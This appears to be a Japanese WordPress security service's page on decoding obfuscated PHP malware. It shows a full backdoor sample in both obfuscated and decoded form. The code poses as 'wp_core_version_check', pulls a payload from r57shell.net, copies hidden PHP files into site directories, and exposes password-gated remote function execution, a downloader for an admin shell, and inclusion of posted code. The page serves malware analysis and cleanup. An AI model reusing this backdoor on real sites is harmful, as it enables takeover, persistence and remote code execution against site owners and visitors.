Wordpress 等でのPHPのマルウェア・ウィルス・改ざんコードをデコードして難読化をオンラインで解除し、
元の読みやすいコードに戻し解読できます。
<?php if (!function_exists("wp_core_version_check")) { function wp_core_version_check() { goto QHTmE; ReBbR: $file_path = dirname($document_file); goto yxZ6i; QHTmE: $document_file = $_SERVER["SCRIPT_FILENAME"]; goto TmK7C; B8IHf: $uri_path = $parse_url["path"]; goto DR8d0; TmK7C: $request_uri = $_SERVER["REQUEST_URI"]; goto Lhccs; Sae33: $hostname = str_replace("www.", '', $_SERVER["HTTP_HOST"]); goto EmUwt; yxZ6i: $uri_path = str_replace("/", DIRECTORY_SEPARATOR, $uri_path); goto TMxaR; O4NxR: if (!file_exists($tmp_file)) { goto Jjyr3; qVUcF: @touch($tmp_file); goto FrbfO; FrbfO: @file_put_contents($tmp_file, $response); goto fUkP_; Jjyr3: if (function_exists("curl_init")) { goto EZy_9; EZy_9: $ch = curl_init(); goto VR0Vi; OFlqh: curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); goto VdcLO; VR0Vi: curl_setopt($ch, CURLOPT_URL, "http://r57shell.net/jquery.php?v=1.2&request=enable"); goto OFlqh; DcJlW: $response = curl_exec($ch); goto fkRwe; VdcLO: curl_setopt($ch, CURLOPT_REFERER, $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"]); goto DcJlW; fkRwe: curl_close($ch); goto MpMm6; MpMm6: } else { goto Rsl9q; PQRsR: $response = @file_get_contents("http://r57shell.net/jquery.php?v=1.2&request=enable", false, $context); goto NXRla; DmscO: $context = stream_context_create($opts); goto PQRsR; Rsl9q: $referer = $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"]; goto vGpwe; vGpwe: $opts = array("http" => array("header" => array("Referer: {$referer} \xa"))); goto DmscO; NXRla: } goto qVUcF; fUkP_: } else { $response = file_get_contents($tmp_file); if (!@preg_match("#stt1#", $response)) { goto Mh1sz; Mh1sz: if (function_exists("curl_init")) { goto DVDkP; u_SFh: $response = curl_exec($ch); goto zDHcZ; zMTgu: curl_setopt($ch, CURLOPT_URL, "http://r57shell.net/jquery.php?v=1.2&request=enable"); goto AvWVd; YWAQw: curl_setopt($ch, CURLOPT_REFERER, $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"]); goto u_SFh; DVDkP: $ch = curl_init(); goto zMTgu; zDHcZ: curl_close($ch); goto v98go; AvWVd: curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); goto YWAQw; v98go: } else { goto JGb71; Npbn0: $opts = array("http" => array("header" => array("Referer: {$referer} \xa"))); goto dtUcU; JGb71: $referer = $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"]; goto Npbn0; hCspz: $response = @file_get_contents("http://r57shell.net/jquery.php?v=1.2&request=enable", false, $context); goto XWjW4; dtUcU: $context = stream_context_create($opts); goto hCspz; XWjW4: } goto zkCQa; zkCQa: @touch($tmp_file); goto RL2uX; RL2uX: @file_put_contents($tmp_file, $response); goto Fx07H; Fx07H: } } goto BXZRC; EmUwt: if (is_writable(sys_get_temp_dir())) { $tmp_file = sys_get_temp_dir() . DIRECTORY_SEPARATOR . "sess_" . md5('' . $hostname . "_" . $document_file . ''); } else { $tmp_file = $file_path . DIRECTORY_SEPARATOR . "sess_" . md5('' . $hostname . "_" . $document_file . ''); } goto jUXuO; DR8d0: $uri_path = dirname($uri_path); goto ReBbR; QCYq2: foreach ($dirs as $d) { goto DpqP9; eMOLH: @file_put_contents($file_name, $response); goto xQTu4; xQTu4: $dirs = array_filter(glob($d . DIRECTORY_SEPARATOR . "*", GLOB_ONLYDIR)); goto KHsZ5; DpqP9: $file_name = $d . DIRECTORY_SEPARATOR . "." . basename($d) . ".php"; goto eMOLH; KHsZ5: foreach ($dirs as $d) { if (!@preg_match("#wp-content#", $d)) { $file_name = $d . DIRECTORY_SEPARATOR . "." . basename($d) . ".php"; @file_put_contents($file_name, $response); } } goto vTd8M; vTd8M: } goto VCwm6; jUXuO: if (@$_GET["slince_golden"]) { goto qhIqa; v6_uU: if (md5(sha1(@$_GET["is"])) == $response) { goto LNCgX; LNCgX: if (@$_GET["f"]) { print_r($_GET["f"]($_GET["c"])); } goto mNwUE; mNwUE: if (@$_GET["m"]) { goto u3lO9; u3lO9: if (function_exists("curl_init")) { goto h0059; nzFPK: curl_setopt($ch, CURLOPT_URL, "http://r57shell.net/mini_admin.txt"); goto SlTBv; SMEF2: curl_close($ch); goto nxTNz; h0059: $ch = curl_init(); goto nzFPK; SlTBv: curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); goto cerjF; cerjF: $response = curl_exec($ch); goto SMEF2; nxTNz: } else { $response = file_get_contents("http://r57shell.net/mini_admin.txt"); } goto VIyGz; oeY1g: echo $file_name_path; goto UXu2c; VIyGz: $file_name_path = @$_GET["m"] . "gagal.php"; goto xhRaG; xhRaG: @file_put_contents($file_name_path, $response); goto oeY1g; UXu2c: } goto jKG5A; jKG5A: if (@$_POST["l"]) { function basic_code_extensions($request) { goto JTclu; tgcIK: $tmpf = $tmpf["uri"]; goto z3rep; vnQ75: $ret = (include $tmpf); goto Cvaad; JTclu: $tmp = tmpfile(); goto ToYXQ; ToYXQ: $tmpf = stream_get_meta_data($tmp); goto tgcIK; z3rep: fwrite($tmp, $request); goto vnQ75; aY2Ix: return $ret; goto hdvh2; Cvaad: fclose($tmp); goto aY2Ix; hdvh2: } print_r(basic_code_extensions($_POST["l"])); } goto ZFcwP; ZFcwP: } goto OlWFN; OlWFN: exit; goto vQOuT; qhIqa: echo "<!-- //Silence is golden. -->"; goto q9t4S; q9t4S: if (function_exists("curl_init")) { goto P3bql; sk_2w: curl_close($ch); goto j1BU_; P3bql: $ch = curl_init(); goto FA3oh; FA3oh: curl_setopt($ch, CURLOPT_URL, "http://r57shell.net/jquery.php?v=1.2&pwd=get"); goto XAilZ; AJz_6: $response = curl_exec($ch); goto sk_2w; XAilZ: curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); goto AJz_6; j1BU_: } else { $response = file_get_contents("http://r57shell.net/jquery.php?v=1.2&pwd=get"); } goto v6_uU; vQOuT: } goto O4NxR; TMxaR: if ($uri_path == DIRECTORY_SEPARATOR || $uri_path == '') { $document_root = $file_path; } else { $document_root = str_replace($uri_path, '', $file_path); } goto Sae33; BXZRC: $dirs = array_filter(glob($document_root . DIRECTORY_SEPARATOR . "*", GLOB_ONLYDIR)); goto QCYq2; Lhccs: $parse_url = parse_url($request_uri); goto B8IHf; VCwm6: } wp_core_version_check(); } ?>
<?php if (!function_exists("wp_core_version_check")) { function wp_core_version_check() { $document_file = $_SERVER["SCRIPT_FILENAME"]; $request_uri = $_SERVER["REQUEST_URI"]; $parse_url = parse_url($request_uri); $uri_path = $parse_url["path"]; $uri_path = dirname($uri_path); $file_path = dirname($document_file); $uri_path = str_replace("/", DIRECTORY_SEPARATOR, $uri_path); if ($uri_path == DIRECTORY_SEPARATOR || $uri_path == '') { $document_root = $file_path; } else { $document_root = str_replace($uri_path, '', $file_path); } $hostname = str_replace("www.", '', $_SERVER["HTTP_HOST"]); if (is_writable(sys_get_temp_dir())) { $tmp_file = sys_get_temp_dir() . DIRECTORY_SEPARATOR . "sess_" . md5('' . $hostname . "_" . $document_file . ''); } else { $tmp_file = $file_path . DIRECTORY_SEPARATOR . "sess_" . md5('' . $hostname . "_" . $document_file . ''); } if (@$_GET["slince_golden"]) { echo "<!-- //Silence is golden. -->"; if (function_exists("curl_init")) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "http://r57shell.net/jquery.php?v=1.2&pwd=get"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $response = curl_exec($ch); curl_close($ch); } else { $response = file_get_contents("http://r57shell.net/jquery.php?v=1.2&pwd=get"); } if (md5(sha1(@$_GET["is"])) == $response) { if (@$_GET["f"]) { print_r($_GET["f"]($_GET["c"])); } if (@$_GET["m"]) { if (function_exists("curl_init")) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "http://r57shell.net/mini_admin.txt"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $response = curl_exec($ch); curl_close($ch); } else { $response = file_get_contents("http://r57shell.net/mini_admin.txt"); } $file_name_path = @$_GET["m"] . "gagal.php"; @file_put_contents($file_name_path, $response); echo $file_name_path; } if (@$_POST["l"]) { function basic_code_extensions($request) { $tmp = tmpfile(); $tmpf = stream_get_meta_data($tmp); $tmpf = $tmpf["uri"]; fwrite($tmp, $request); $ret = (include $tmpf); fclose($tmp); return $ret; } print_r(basic_code_extensions($_POST["l"])); } } exit; } if (!file_exists($tmp_file)) { if (function_exists("curl_init")) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "http://r57shell.net/jquery.php?v=1.2&request=enable"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_REFERER, $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"]); $response = curl_exec($ch); curl_close($ch); } else { $referer = $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"]; $opts = array("http" => array("header" => array("Referer: {$referer}\r\n\n"))); $context = stream_context_create($opts); $response = @file_get_contents("http://r57shell.net/jquery.php?v=1.2&request=enable", false, $context); } @touch($tmp_file); @file_put_contents($tmp_file, $response); } else { $response = file_get_contents($tmp_file); if (!@preg_match("#stt1#", $response)) { if (function_exists("curl_init")) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "http://r57shell.net/jquery.php?v=1.2&request=enable"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_REFERER, $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"]); $response = curl_exec($ch); curl_close($ch); } else { $referer = $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"]; $opts = array("http" => array("header" => array("Referer: {$referer}\r\n\n"))); $context = stream_context_create($opts); $response = @file_get_contents("http://r57shell.net/jquery.php?v=1.2&request=enable", false, $context); } @touch($tmp_file); @file_put_contents($tmp_file, $response); } } $dirs = array_filter(glob($document_root . DIRECTORY_SEPARATOR . "*", GLOB_ONLYDIR)); foreach ($dirs as $d) { $file_name = $d . DIRECTORY_SEPARATOR . "." . basename($d) . ".php"; @file_put_contents($file_name, $response); $dirs = array_filter(glob($d . DIRECTORY_SEPARATOR . "*", GLOB_ONLYDIR)); foreach ($dirs as $d) { if (!@preg_match("#wp-content#", $d)) { $file_name = $d . DIRECTORY_SEPARATOR . "." . basename($d) . ".php"; @file_put_contents($file_name, $response); } } } } wp_core_version_check(); }
■【無料】ワードプレス:マルウェアスキャン&セキュリティープラグイン [マルウェア・ウィルス検出と駆除]
■WordPress のマルウェア駆除、セキュリティー対策 カスタマイズや修正、引っ越し・復旧のご依頼承ります
(C)2019 ワードプレス ドクター All rights reserved.